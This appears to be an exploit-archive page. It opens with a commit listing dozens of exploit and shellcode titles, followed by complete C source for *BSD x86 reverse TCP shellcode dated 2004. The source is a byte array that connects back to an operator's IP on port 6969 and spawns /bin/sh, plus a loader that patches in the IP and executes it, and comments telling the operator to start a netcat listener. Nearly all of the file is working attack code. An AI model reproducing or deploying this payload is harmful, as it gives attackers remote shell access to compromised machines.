81d6f781ab
31 changes to exploits/shellcodes MiniUPnP MiniUPnPc < 2.0 - Remote Denial of Service Android - Hardware Service Manager Arbitrary Service Replacement due to getpidcon Microsoft Windows - NTFS Owner/Mandatory Label Privilege Bypass Microsoft Windows - NtImpersonateAnonymousToken AC to Non-AC Privilege Escalation Microsoft Windows - NtImpersonateAnonymousToken LPAC to Non-LPAC Privilege Escalation Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation macOS - 'process_policy' Stack Leak Through Uninitialized Field Microsoft Edge Chakra - 'AppendLeftOverItemsFromEndSegment' Out-of-Bounds Read Jungo Windriver 12.5.1 - Privilege Escalation Jungo Windriver 12.5.1 - Local Privilege Escalation Parity Browser < 1.6.10 - Bypass Same Origin Policy Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' MITM Remote Code Execution VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' Man In The Middle Remote Code Execution Granding MA300 - Traffic Sniffing MitM Fingerprint PIN Disclosure Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure LabF nfsAxe 3.7 FTP Client - Stack Buffer Overflow (Metasploit) phpCollab 2.5.1 - Unauthenticated File Upload (Metasploit) eVestigator Forensic PenTester - MITM Remote Code Execution eVestigator Forensic PenTester - Man In The Middle Remote Code Execution BestSafe Browser - MITM Remote Code Execution BestSafe Browser - Man In The Middle Remote Code Execution SKILLS.com.au Industry App - MITM Remote Code Execution Virtual Postage (VPA) - MITM Remote Code Execution SKILLS.com.au Industry App - Man In The Middle Remote Code Execution Virtual Postage (VPA) - Man In The Middle Remote Code Execution Trend Micro OfficeScan 11.0/XG (12.0) - MITM Remote Code Execution Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution SAP NetWeaver J2EE Engine 7.40 - SQL Injection D-Link Routers 110/412/615/815 < 1.03 - 'service.cgi' Arbitrary Code Execution FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes) BSD/x86 - Reverse TCP Shell (192.168.2.33:6969/TCP) Shellcode (129 bytes) FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes) FreeBSD/x86 - Bind TCP Password /bin/sh Shell (4883/TCP) Shellcode (222 bytes) Cisco IOS - New TTY / Privilege Level To 15 / Reverse Virtual Terminal Shell (21/TCP) Shellcode Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode HPUX - execve /bin/sh Shellcode (58 bytes) Cisco IOS - New TTY + Privilege Level To 15 + Reverse Virtual Terminal Shell (21/TCP) Shellcode Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode HP-UX - execve /bin/sh Shellcode (58 bytes) OpenBSD/x86 - execve /bin/sh Shellcode (23 Bytes) OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes) ARM - Bind TCP Shell (0x1337/TCP) Shellcode ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode ARM - ifconfig eth0 192.168.0.2 up Shellcode Linux/ARM - Bind TCP Shell (0x1337/TCP) Shellcode Linux/ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes) FreeBSD/x86 - Bind TCP /bin/sh Shell (31337/TCP) + Fork Shellcode (111 bytes) Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 Bytes) Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes) Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes) Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 bytes) Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes) Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes) Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes) Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes) FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes) FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes) FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes) FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes) FreeBSD/x86 - Bind TCP /bin/sh Shell (41254/TCP) Shellcode (115 bytes) FreeBSD - reboot() Shellcode (15 Bytes) IRIX - execve(/bin/sh -c) Shellcode (72 bytes) IRIX - execve(/bin/sh) Shellcode (43 bytes) IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes) IRIX - execve(/bin/sh) Shellcode (68 bytes) IRIX - stdin-read Shellcode (40 bytes) Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes) Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes) Linux/x86 - Read /etc/passwd Shellcode (54 Bytes) Linux/x86 - Read /etc/passwd Shellcode (54 bytes) Linux/x86-64 - execve /bin/sh Shellcode (21 Bytes) Linux/x86-64 - execve /bin/sh Shellcode (21 bytes)
66 lines
No EOL
1.5 KiB
C
66 lines
No EOL
1.5 KiB
C
/* reverse-portshell *BSD shellcode by noir */
|
|
/* local usage: ./reverse-shell 192.168.2.33 */
|
|
/* remote: nc -n -v -v -l -p 6969 */
|
|
/* listen on 6969/tcp */
|
|
/* noir@gsu.linux.org.tr */
|
|
|
|
char shellcode[] =
|
|
{
|
|
0x31,0xc9,0x51,0x41,
|
|
0x51,0x41,0x51,0x51,
|
|
0x31,0xc0,0xb0,0x61,
|
|
0xcd,0x80,0x89,0x07,
|
|
0x31,0xc9,0x88,0x4f,
|
|
0x04,0xc6,0x47,0x05,
|
|
0x02,0xc7,0x47,0x08,
|
|
0xc0,0xa8,0x01,0x45, //ipaddr
|
|
0x66,0xc7,0x47,0x06,
|
|
0x1b,0x39,0x6a,0x10,
|
|
0x8d,0x47,0x04,0x50,
|
|
0x8b,0x07,0x50,0x50,
|
|
0x31,0xc0,0xb0,0x62,
|
|
0xcd,0x80,0x31,0xc9,
|
|
0x51,0x8b,0x07,0x50,
|
|
0x50,0x31,0xc0,0xb0,
|
|
0x5a,0xcd,0x80,0x41,
|
|
0x83,0xf9,0x03,0x75,
|
|
0xef,0x31,0xc9,0x51,
|
|
0x51,0x31,0xc0,0xb0,
|
|
0x17,0xcd,0x80,0xeb,
|
|
0x23,0x5b,0x89,0x1f,
|
|
0x31,0xc9,0x88,0x4b,
|
|
0x07,0x89,0x4f,0x04,
|
|
0x51,0x8d,0x07,0x50,
|
|
0x8b,0x07,0x50,0x50,
|
|
0x31,0xc0,0xb0,0x3b,
|
|
0xcd,0x80,0x31,0xc9,
|
|
0x51,0x51,0x31,0xc0,
|
|
0xb0,0x01,0xcd,0x80,
|
|
0xe8,0xd8,0xff,0xff,
|
|
0xff,0x2f,0x62,0x69,
|
|
0x6e,0x2f,0x73,0x68,
|
|
0x41
|
|
};
|
|
|
|
int
|
|
main(int argc, char ** argv)
|
|
{
|
|
void (*f) (void);
|
|
unsigned int d;
|
|
|
|
if(!argv[0])
|
|
exit(0);
|
|
|
|
d = inet_addr(argv[1]);
|
|
printf("IP: %lx shellcode len: %d\n", d, strlen(shellcode));
|
|
|
|
shellcode[28] = d & 0xff ;
|
|
shellcode[29] = (d >> 8) & 0xff;
|
|
shellcode[30] = (d >> 16) & 0xff;
|
|
shellcode[31] = (d >> 24) & 0xff;
|
|
|
|
f = (void *) shellcode;
|
|
f();
|
|
}
|
|
|
|
// milw0rm.com [2004-09-26]
|